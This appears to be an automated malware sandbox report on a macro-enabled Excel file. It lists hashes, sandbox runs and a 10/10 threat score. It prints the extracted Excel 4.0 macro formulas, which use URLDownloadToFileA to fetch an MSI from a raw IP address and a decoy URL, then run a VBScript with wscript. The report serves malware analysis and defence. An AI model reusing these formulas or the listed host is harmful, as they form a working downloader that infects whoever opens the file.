General
-
Target
b8c2f17712a9c4518f43446b3a394535
-
Size
6KB
-
Sample
231222-rgcsesffar
-
MD5
b8c2f17712a9c4518f43446b3a394535
-
SHA1
f5011d5feacf363e3eeeb03b986dab3752e14426
-
SHA256
609d25981f7a9ccf2eb9d4b5b13c19c7567801d5892974165cc3ace671ab49a8
-
SHA512
ddb559a95e14f11811716a5ad6be21839c26f948b4d69d5fe82bab5b73a77b1dd134ff05546c191d6766c613f8a25f9eed9247058cf5d067696815d500500da8
-
SSDEEP
192:NDS0uSKbrA2OmmfR18UhHFBFYuzb98yaHlA+7:NnuXM2wz1FY2b98yK1
Static task
static1
Behavioral task
behavioral1
Sample
b8c2f17712a9c4518f43446b3a394535.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b8c2f17712a9c4518f43446b3a394535.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
b8c2f17712a9c4518f43446b3a394535
-
Size
6KB
-
MD5
b8c2f17712a9c4518f43446b3a394535
-
SHA1
f5011d5feacf363e3eeeb03b986dab3752e14426
-
SHA256
609d25981f7a9ccf2eb9d4b5b13c19c7567801d5892974165cc3ace671ab49a8
-
SHA512
ddb559a95e14f11811716a5ad6be21839c26f948b4d69d5fe82bab5b73a77b1dd134ff05546c191d6766c613f8a25f9eed9247058cf5d067696815d500500da8
-
SSDEEP
192:NDS0uSKbrA2OmmfR18UhHFBFYuzb98yaHlA+7:NnuXM2wz1FY2b98yK1
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-